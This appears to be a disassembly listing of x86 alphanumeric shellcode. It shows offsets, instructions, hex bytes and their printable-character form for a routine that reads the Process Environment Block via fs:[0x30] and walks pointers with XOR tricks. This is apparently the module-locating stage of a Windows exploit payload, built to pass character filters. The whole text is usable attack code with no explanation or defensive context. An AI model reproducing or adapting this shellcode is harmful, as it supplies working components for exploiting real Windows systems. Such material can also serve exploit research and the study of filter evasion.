0x0        push 0x30                           \x6a\x30                  j0        
0x2        pop eax                             \x58                      X         
0x3        xor al, 0x30                        \x34\x30                  40        
0x5        push eax                            \x50                      P         
0x6        push eax                            \x50                      P         
0x7        push eax                            \x50                      P         
0x8        xor eax, dword ptr fs:[eax + 0x30]  \x64\x33\x40\x30          d3@0      
0xc        pop esi                             \x5e                      ^         
0xd        push esi                            \x56                      V         
0xe        xor al, 0x4c                        \x34\x4c                  4L        
0x10       xor al, 0x40                        \x34\x40                  4@        
0x12       pop esi                             \x5e                      ^         
0x13       push esi                            \x56                      V         
0x14       xor esi, dword ptr [eax]            \x33\x30                  30        
0x16       push esi                            \x56                      V         
0x17       pop eax                             \x58                      X         
0x18       pop esi                             \x5e                      ^         
0x19       xor al, 0x50                        \x34\x50                  4P        
0x1b       xor al, 0x4c                        \x34\x4c                  4L        
0x1d       xor esi, dword ptr [eax]            \x33\x30                  30        
0x1f       pop eax                             \x58                      X         
0x20       push eax                            \x50                      P         
0x21       push esi                            \x56                      V         
0x22       pop eax                             \x58                      X         
0x23       pop esi                             \x5e                      ^         
0x24       xor esi, dword ptr [eax]            \x33\x30                  30        
0x26       push esi                            \x56                      V         
0x27       pop eax                             \x58                      X         
0x28       pop esi                             \x5e                      ^         
0x29       xor al, 0x58                        \x34\x58                  4X        
0x2b       xor al, 0x50                        \x34\x50                  4P        
0x2d       xor esi, dword ptr [eax]            \x33\x30                  30        
0x2f       push esi                            \x56                      V         
0x30       pop eax                             \x58                      X         
